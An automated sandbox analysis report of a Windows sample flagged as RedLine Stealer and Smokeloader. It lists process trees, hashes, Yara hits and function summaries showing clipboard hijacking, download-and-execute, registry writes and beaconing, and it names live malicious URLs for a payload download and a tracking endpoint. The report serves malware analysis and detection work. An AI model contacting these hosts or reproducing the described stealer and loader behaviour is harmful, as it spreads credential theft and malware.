2025-01-11 07:11:39 UTC	1123	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:11:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=il93aia6aofr85ciacsjuieqt5; expires=Wed, 07 May 2025 00:58:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hlhwtqn%2FqII9R29PgPzsGA4h1rrCnIescXoP0D0VddnHVf%2BzBTpBZbbP1TFPTtDWzc5cKB3YqHb0DUjMjQVcpjveHiLsQurdWGvjmWi7PO5xRh5bUrMg9ehLOhTn5Pk6Me5a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003180c2fa5de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1509&rtt_var=580&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21337&delivery_rate=1864623&cwnd=209&unsent_bytes=0&cid=43b504ce40417d25&ts=950&x=0"
2025-01-11 07:11:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-11 07:11:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:11:10
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\b0cQukXPAl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\b0cQukXPAl.exe"
Imagebase:	0x400000
File size:	385'536 bytes
MD5 hash:	9FC816BB0CBE07F412D1DDA6FEEDB96F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3754052818.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:11:15
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\Temp\2889.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\2889.tmp.exe"
Imagebase:	0x400000
File size:	333'312 bytes
MD5 hash:	1B513E6F8721E444A9364DD93630F015
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1792085926.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1792386987.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:11:39
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1852
Imagebase:	0xdb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	20.7%
Signature Coverage:	5.7%
Total number of Nodes:	760
Total number of Limit Nodes:	21

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

Function 004029EA Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
CloseHandle.KERNEL32(00000000), ref: 00402AFD
ShellExecuteExW.SHELL32(?), ref: 00402B5E
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
CloseHandle.KERNEL32(?), ref: 00402B7F
InternetCloseHandle.WININET(00000000), ref: 00402B88
InternetCloseHandle.WININET(00000000), ref: 00402B8B

Strings

<, xrefs: 00402B3B
.exe, xrefs: 00402A61
ShareScreen, xrefs: 00402A08

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4

Function 005607A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005607CE
Module32First.KERNEL32(00000000,00000224), ref: 005607EE

Memory Dump Source

Source File: 00000000.00000002.3754052818.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_560000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: f2ac7dd32b7bcaea2242f36d7a98d77d9b9b43e0297924d86d601794ae2682f4
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 9DF06D322017116FE7203AB9A88DA6F7BE8FF89765F101528E642920C0DAB0F9458A61

Function 0043D02C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17

GetLastError.KERNEL32 ref: 0043D140
__dosmaperr.LIBCMT ref: 0043D147
GetFileType.KERNEL32(00000000), ref: 0043D153
GetLastError.KERNEL32 ref: 0043D15D
__dosmaperr.LIBCMT ref: 0043D166
CloseHandle.KERNEL32(00000000), ref: 0043D186
CloseHandle.KERNEL32(?), ref: 0043D2D0
GetLastError.KERNEL32 ref: 0043D302
__dosmaperr.LIBCMT ref: 0043D309

Strings

H, xrefs: 0043D28E

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

Function 00432F19 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

Function 020F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 020F024D

Strings

cess, xrefs: 020F018D
kernel32.dll, xrefs: 020F008F, 020F0095

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14

Function 00402BFA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
InternetCloseHandle.WININET(00000000), ref: 00402E41
InternetCloseHandle.WININET(00000000), ref: 00402E44

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C4D, 00402D79, 00402DE8
&cc=DE, xrefs: 00402DAA, 00402DB0, 00402E0D
ShareScreen, xrefs: 00402C18

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

Function 004051C6 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051DA
__Mtx_init.LIBCPMT ref: 00405200
std::_Cnd_initX.LIBCPMT ref: 00405223
__Thrd_start.LIBCPMT ref: 00405248
std::_Cnd_waitX.LIBCPMT ref: 00405268
std::_Cnd_initX.LIBCPMT ref: 00405295

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

Function 004057F6 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 00405812
__Cnd_signal.LIBCPMT ref: 0040581E
std::_Cnd_initX.LIBCPMT ref: 00405833
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

Function 00402956 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00402985
__fassign.LIBCMT ref: 00402995

Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC

Strings

+@, xrefs: 004029DA

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID: +@
API String ID: 2843524283-4068139069
Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

Function 0042DFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC, 0040F1DD

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: <(@
API String ID: 1611280651-4189137628
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

Function 0042E104 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
__dosmaperr.LIBCMT ref: 0042E160

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

Function 00434745 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
__dosmaperr.LIBCMT ref: 0043478F

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

Function 00402BA3 Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

Function 0042E064 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC

ExitThread.KERNEL32 ref: 0042E076
CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

Function 00402394 Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
PostQuitMessage.USER32(00000000), ref: 00402559

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001562), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E

Function 020F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,020F0223,?,?), ref: 020F0E19
SetErrorMode.KERNEL32(00000000,?,?,020F0223,?,?), ref: 020F0E1E

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
